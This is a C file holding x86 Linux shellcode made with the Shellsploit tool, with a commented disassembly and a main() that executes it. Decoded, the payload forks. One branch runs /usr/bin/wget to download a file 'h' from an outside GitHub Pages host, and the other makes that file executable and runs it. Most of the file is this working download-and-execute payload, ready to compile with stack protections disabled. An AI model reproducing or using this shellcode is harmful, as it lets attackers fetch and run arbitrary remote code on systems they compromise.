99 lines
No EOL
3.8 KiB
C
99 lines
No EOL
3.8 KiB
C
/*
|
|
--------------------------------------------------------------------------------------------------------
|
|
|
|
[+] Author : B3mB4m
|
|
[~] Contact : b3mb4m@protonmail.com
|
|
[~] Project : https://github.com/b3mb4m/Shellsploit
|
|
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
|
|
[~] Poc : http://imgur.com/hHB4yiQ
|
|
|
|
|
|
#We are still working on ROP Chain, stay tuned :)
|
|
|
|
|
|
"""
|
|
You can convert it an elf file:
|
|
|
|
https://www.virustotal.com/en/file/93c214f7b4362937f05f5732ba2f7f1db53e2a5775ab7bafdba954e691f74c82/analysis/1454113925/
|
|
|
|
If you want test:
|
|
Important : your filename len must be one byte(Weird bug I'll fix it
|
|
soon lol).
|
|
Default settings for http://b3mb4m.github.io/exec/h
|
|
Source codes : b3mb4m.github.io/exec/hello.asm
|
|
"""
|
|
|
|
|
|
|
|
00000000 31C0 xor eax,eax
|
|
00000002 B002 mov al,0x2
|
|
00000004 CD80 int 0x80
|
|
00000006 31DB xor ebx,ebx
|
|
00000008 39D8 cmp eax,ebx
|
|
0000000A 743B jz 0x47
|
|
0000000C 31C9 xor ecx,ecx
|
|
0000000E 31DB xor ebx,ebx
|
|
00000010 31C0 xor eax,eax
|
|
00000012 6A05 push byte +0x5
|
|
00000014 89E1 mov ecx,esp
|
|
00000016 89E1 mov ecx,esp
|
|
00000018 89E3 mov ebx,esp
|
|
0000001A B0A2 mov al,0xa2
|
|
0000001C CD80 int 0x80
|
|
0000001E 31C9 xor ecx,ecx
|
|
00000020 31C0 xor eax,eax
|
|
00000022 50 push eax
|
|
00000023 B00F mov al,0xf
|
|
00000025 6A68 push byte +0x68
|
|
00000027 89E3 mov ebx,esp
|
|
00000029 31C9 xor ecx,ecx
|
|
0000002B 66B9FF01 mov cx,0x1ff
|
|
0000002F CD80 int 0x80
|
|
00000031 31C0 xor eax,eax
|
|
00000033 50 push eax
|
|
00000034 6A68 push byte +0x68
|
|
00000036 89E3 mov ebx,esp
|
|
00000038 50 push eax
|
|
00000039 89E2 mov edx,esp
|
|
0000003B 53 push ebx
|
|
0000003C 89E1 mov ecx,esp
|
|
0000003E B00B mov al,0xb
|
|
00000040 CD80 int 0x80
|
|
00000042 31C0 xor eax,eax
|
|
00000044 40 inc eax
|
|
00000045 CD80 int 0x80
|
|
00000047 6A0B push byte +0xb
|
|
00000049 58 pop eax
|
|
0000004A 99 cdq
|
|
0000004B 52 push edx
|
|
0000004C 6865632F68 push dword 0x682f6365
|
|
00000051 682F2F6578 push dword 0x78652f2f
|
|
00000056 68622E696F push dword 0x6f692e62
|
|
0000005B 6869746875 push dword 0x75687469
|
|
00000060 68346D2E67 push dword 0x672e6d34
|
|
00000065 6862336D62 push dword 0x626d3362
|
|
0000006A 89E1 mov ecx,esp
|
|
0000006C 52 push edx
|
|
0000006D 6A74 push byte +0x74
|
|
0000006F 682F776765 push dword 0x6567772f
|
|
00000074 682F62696E push dword 0x6e69622f
|
|
00000079 682F757372 push dword 0x7273752f
|
|
0000007E 89E3 mov ebx,esp
|
|
00000080 52 push edx
|
|
00000081 51 push ecx
|
|
00000082 53 push ebx
|
|
00000083 89E1 mov ecx,esp
|
|
00000085 CD80 int 0x80
|
|
*/
|
|
|
|
//Project : https://github.com/b3mb4m/Shellsploit
|
|
//This file created with shellsploit ..
|
|
//30/01/2016 - 02:59:21
|
|
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
|
|
|
|
unsigned char shellcode[] =
|
|
"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x68\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52\x68\x65\x63\x2f\x68\x68\x2f\x2f\x65\x78\x68\x62\x2e\x69\x6f\x68\x69\x74\x68\x75\x68\x34\x6d\x2e\x67\x68\x62\x33\x6d\x62\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
|
|
|
|
int main(void){
|
|
(*(void(*)()) shellcode)();
|
|
} |